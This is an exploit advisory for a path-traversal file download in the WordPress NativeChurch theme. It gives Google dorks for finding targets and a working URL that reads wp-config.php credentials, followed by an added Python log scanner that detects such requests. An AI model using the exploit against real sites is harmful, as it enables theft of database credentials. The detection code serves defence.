
WordPress NativeChurch Multi-Purpose 5.0.x File Download

25 Feb 2019 00:00:00. Reported by KingSkrupellos. Type: packetstorm. Source: packetstormsecurity.com

WordPress NativeChurch Multi-Purpose 5.0.x Arbitrary File Download, Vulnerability Type CWE-264, CWE-2

Code
`####################################################################  
  
# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 26/02/2019  
# Vendor Homepage : themeforest.net  
# Software Information Link :   
themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446  
# Software Affected Versions : WordPress From 3.9 to 5.0.x   
Compatible with Bootstrap 3.x - bbPress 2.5.x  
From WooCommerce 2.1.x To WooCommerce 3.4.x,   
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"  
inurl:''inurl:/wp-content/themes/NativeChurch/download/''  
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]  
CWE-23 [ Relative Path Traversal ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
NativeChurch is a powerful WordPress Theme designed & developed for Church,  
Charity, Non-Profit and Religious Websites and comes in handy  
for Portfolio/Corporate Websites as well.  
  
####################################################################  
  
# Impact :  
***********  
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers  
download arbitrary files because the application fails to sufficiently sanitize user-supplied input.  
An attacker can exploit this issue to download arbitrary files within the context  
of the web server process. Information obtained may aid in further attacks.  
Attackers can use a browser to exploit this issue.  
  
* The software uses external input to construct a pathname that should be within a  
restricted directory, but it does not properly neutralize sequences  
such as ".." that can resolve to a location that is outside of that directory.  
  
####################################################################  
  
# Arbitrary File Download Exploit :  
******************************  
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php  
  
# Example Information from the MySQL WordPress Configuration File :  
***********************************************************  
/** Name of the WordPress database. */  
define('DB_NAME',   
  
/** MySQL database user. */  
define('DB_USER',   
  
/** MySQL database password. */  
define('DB_PASSWORD',   
  
/** MySQL host address. */  
define('DB_HOST',   
  
###################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
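
A defender-side check for the traversal described in this advisory, as an added example that is not part of the original advisory or the theme's code: it scans web access-log lines for requests to the download.php endpoint whose file parameter resolves outside the download directory, including percent-encoded and double-encoded forms. The log lines are constructed samples; the combined log format and the helper names are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint named in the advisory; files are expected to stay under its directory.
ENDPOINT = "/wp-content/themes/NativeChurch/download/download.php"
BASE_DIR = posixpath.dirname(ENDPOINT)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # combined-log request field

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded '..' (%252e%252e) is exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(file_param):
    """True if the parameter resolves outside BASE_DIR once normalised."""
    candidate = fully_decode(file_param).replace("\\", "/")
    if candidate.startswith("/"):
        return True  # an absolute path ignores the base directory entirely
    resolved = posixpath.normpath(posixpath.join(BASE_DIR, candidate))
    return not (resolved + "/").startswith(BASE_DIR + "/")

def suspicious_requests(log_lines):
    """Return (client_ip, decoded file parameter) for requests that leave BASE_DIR."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if target.path.lower() != ENDPOINT.lower():
            continue
        for value in parse_qs(target.query).get("file", []):
            if escapes_base(value):
                hits.append((line.split()[0], fully_decode(value)))
    return hits

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Feb/2019:10:01:02 +0000] "GET /wp-content/themes/NativeChurch/download/download.php?file=sample.pdf HTTP/1.1" 200 48211',
    '203.0.113.9 - - [26/Feb/2019:10:03:44 +0000] "GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.9 - - [26/Feb/2019:10:03:51 +0000] "GET /wp-content/themes/NativeChurch/download/download.php?file=%252e%252e%252f%252e%252e%252fwp-config.php HTTP/1.1" 200 3120',
    '192.0.2.15 - - [26/Feb/2019:10:05:00 +0000] "GET /index.php?file=../x HTTP/1.1" 200 512',
]
print(suspicious_requests(SAMPLE_LOG))
```

The same normalise-then-compare test in `escapes_base` is the containment check a download handler needs before opening a file; on a real filesystem it should be applied to the fully resolved path so symbolic links are covered as well.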
